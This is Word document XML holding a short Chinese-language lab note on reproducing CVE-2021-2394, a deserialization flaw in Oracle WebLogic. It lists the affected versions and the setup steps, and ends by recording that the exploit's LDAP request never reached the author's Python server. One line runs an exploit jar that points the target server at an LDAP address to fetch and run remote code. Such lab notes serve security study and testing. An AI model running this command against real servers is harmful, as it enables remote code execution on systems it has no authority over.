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8841" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F569EE">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CVE-2021-2394：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F569EE">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F569EE">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ACF9FC" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="00F569EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F569EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FF0041" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="00F569EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F569EE">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Oracle WebLogic Server 10.3.6.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB990F0" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="00F569EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F569EE">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Oracle WebLogic Server 12.1.3.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F9FA11" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="00F569EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F569EE">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Oracle WebLogic Server 12.2.1.3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FB1E77" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="00F569EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F569EE">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Oracle WebLogic Server 12.2.1.4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CC8F3B" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F569EE">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Oracle WebLogic Server 14.1.1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079F6F4D" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7D9E8A" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1037C524" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">使用版本 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>12.2.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4692A19D" w14:textId="189489E2" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr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启动</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="024ECBF8" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编写弹窗的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>打开python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F3AAF5" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务连上Python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server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F245E2" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="008878C1" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6FC784" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D45F9AE" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="00343706" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下载安装</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>快速版 快速版没有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_projects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4088632D" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="00343706" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B517C74" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="00343706" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注意这里的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10205672" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="00343706" w:rsidRDefault="00DF24EE" w:rsidP="00DF24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Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进去</w:t>
      </w:r>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>racle/Middleware/Oracle_Home1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>oracle_common</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">\common\bin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A100E5" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="00343706" w:rsidRDefault="00DF24EE" w:rsidP="00DF24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343706">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> config.sh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</w:p>
    <w:p w14:paraId="12AC34D9" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24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343706">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后去</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_projects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下启动</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="737432A2" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24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</w:p>
    <w:p w14:paraId="4BC76DD5" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="00343706" w:rsidRDefault="00DF24EE" w:rsidP="00DF24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Cs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6025EBBB" wp14:editId="29D149A4">
            <wp:extent cx="5274310" cy="2232025"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1036623330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23330" name="图片 1" descr="图形用户界面, 网站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5D52" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D81DD92" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编写弹框的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>poc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并开启python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server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1DE827" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18601043" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D02D0D9" wp14:editId="5012FE7B">
            <wp:extent cx="5274310" cy="1048385"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="11973439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43957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9FD" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>开启LDAP服务 连接python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server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F22BF8" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343706">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03B992DF" wp14:editId="014434DB">
            <wp:extent cx="5274310" cy="1090930"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="36744990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49906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B9DC" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462014EC" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24E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 -jar CVE_2021_2394.jar 192.168.1.6 7001 ldap://192.168.1.6:1389/EXP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF8011" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE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E710050" w14:textId="77777777" w:rsidR="00DF24EE" w:rsidRPr="0054288E" w:rsidRDefault="00DF24EE" w:rsidP="00DF24EE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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结果和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1</w:t>
      </w:r>
      <w:r w:rsidRPr="0054288E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4645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一样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 xml:space="preserve"> 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可以发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LDAP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请求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 xml:space="preserve"> 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但是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LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="0054288E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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请求发不到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python server</w:t>
      </w:r>
      <w:r w:rsidRPr="0054288E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>里</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270C382F" w14:textId="77777777" w:rsidR="00CF7C04" w:rsidRDefault="00CF7C04"/>
    <w:sectPr w:rsidR="00CF7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EE"/>
    <w:rsid w:val="005A1CB5"/>
    <w:rsid w:val="008B738E"/>
    <w:rsid w:val="00CF7C04"/>
    <w:rsid w:val="00D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2FE75"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8F1EED9B-D02E-B74B-A969-DAF81BCD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4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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-14T14:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-14T14:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>